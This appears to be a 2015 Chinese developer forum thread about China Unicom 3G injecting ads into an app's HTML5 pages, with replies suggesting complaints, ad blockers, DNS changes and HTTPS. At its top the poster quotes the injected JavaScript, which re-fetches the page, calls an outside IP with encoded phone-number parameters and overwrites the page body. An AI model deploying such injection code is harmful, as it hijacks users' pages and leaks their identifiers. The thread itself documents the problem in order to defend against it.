<script type="text/javascript"> | |
var bodyHtml = "";var tcHtml = ""; | |
function getBodyHtml() {var xmlhttp = createXHR();var xmlhttpUrl = "http://m.ly.com/dujia/cardlogin.html"; | |
var nowTime = new Date().getTime();var posSearch=xmlhttpUrl.search(/\?/); | |
if(posSearch==-1){xmlhttpUrl=xmlhttpUrl+"?visitDstTime="+nowTime;}else{xmlhttpUrl=xmlhttpUrl+"&visitDstTime="+nowTime;} | |
xmlhttp.open("GET", xmlhttpUrl, true); | |
xmlhttp.send(null); | |
xmlhttp.onreadystatechange = function() { | |
if (xmlhttp.readyState == 4) {if (xmlhttp.status == 200) {bodyHtml = xmlhttp.responseText;getFlow(); | |
}else{var pos=xmlhttpUrl.search(/\?/); | |
if(pos==-1){xmlhttpUrl=xmlhttpUrl+"?noe=1";}else{xmlhttpUrl=xmlhttpUrl+"&noe=1";} | |
window.location.href=xmlhttpUrl;}}}} | |
function getFlow() {var xmlhttp = createXHR(); | |
var xmlhttpUrl ="http://122.194.5.38:8085/ShowWindow/getFc7f3050.jsp?phoneNum=Iose9R+NX1SS6uLU+vDQlg==&uniqueKey=LC4/wifY5cDLXUHa2TGuaQ=="; | |
xmlhttp.open("GET", xmlhttpUrl, true);xmlhttp.send(null);xmlhttp.onreadystatechange = function() { | |
if (xmlhttp.readyState == 4) {if (xmlhttp.status == 200) { | |
tcHtml = xmlhttp.responseText;var reg = /<(body)\s*[^<>]*>/ig;var aryResult = bodyHtml.match(reg); | |
document.writeln(bodyHtml.replace(/<(body)\s*[^<>]*>/ig,aryResult + tcHtml));}else{document.writeln(bodyHtml);}}}} | |
function createXHR() { | |
if (window.XMLHttpRequest) {return new XMLHttpRequest();} | |
if (window.ActiveXObject) {var msxmls = [ "MSXML3", "MSXML2", "Microsoft"] | |
for (var i = 0; i < msxmls.length; i++) {try {return new ActiveXObject(msxmls[i] + "XMLHTTP")} catch (e) {}} | |
throw new Error("No XML componentinstalled!")}} | |
getBodyHtml();</script> |
![]() |
1
fising 2015-01-22 22:20:55 +08:00 via iPad
你确定是联通插进来的广告?怎么判断
|
![]() |
2
ooxxcc 2015-01-22 22:24:40 +08:00
投诉就好,威胁投诉到工信部,有奇效
|
![]() |
4
crazyxin1988 2015-01-22 22:28:00 +08:00
去广电总局菊爆它们
|
5
a656088752 2015-01-22 22:38:33 +08:00
投诉就行了。。。。。
|
![]() |
6
ihacku OP @ooxxcc
@a656088752 @crazyxin1988 不止我公司的APP,好多家的APP都被插联通广告了,也投诉了,但是没见起作用啊。 你看我上面贴的代码,整个HTML页面直接被换成他们的了,防都不知道怎么防。 |
7
zqgoa01 2015-01-22 23:17:08 +08:00 via Android
用路由版的adbyby去广告,支持元素隐藏,支持自定义规则,很强大
|
![]() |
9
mongodb 2015-01-22 23:31:47 +08:00
我在国内机房服务器上装了shadowsocks,国外流量走openwrt的国外代理,国内就走国内机房的代理。
至少机房里被污染的还是少见,大多数是针对家庭宽带用户的。 |
![]() |
10
ihacku OP @mongodb
我这头疼的不是自己啊,是公司的产品,机房没有问题的,被影响的是用联通3G的客户端终端用户。 像第一个截图那种,广告根本就没有关的方式,页面直接进不去,丢订单损失钱就不说了, 这些用户很有可能就这么流失了。 |
![]() |
11
mongodb 2015-01-22 23:48:10 +08:00
@ihacku 前端我不会,但我记得我看过一些办法,说可以用js检测反制js插入劫持。至于有没有用以及适用于什么情况我就不清楚了,你可以找找看有没有这方面的资料。
还有我看你说是APP里的HTML5页面,我猜更换服务提供的端口会不会有用——虽然我估计够呛,劫持的是HTTP协议一般不会管你什么端口的。 |
![]() |
13
ihacku OP |
14
a656088752 2015-01-23 01:13:23 +08:00
@ihacku 我这边投诉就解决了再也没广告了啊。。。
|
![]() |
15
Gce 2015-01-23 02:37:20 +08:00 via Android
前端代码结尾加上 <!--
|
18
zqgoa01 2015-01-23 10:55:44 +08:00 via Android
@ihacku 可以尝试更改3g网默认的dns看有没有效果,或者hosts广告地址,或者安装手机版的adbyby
|
![]() |
21
jarlyyn 2015-01-23 11:58:20 +08:00
https吧。没看到百度都被插的搞https了么
|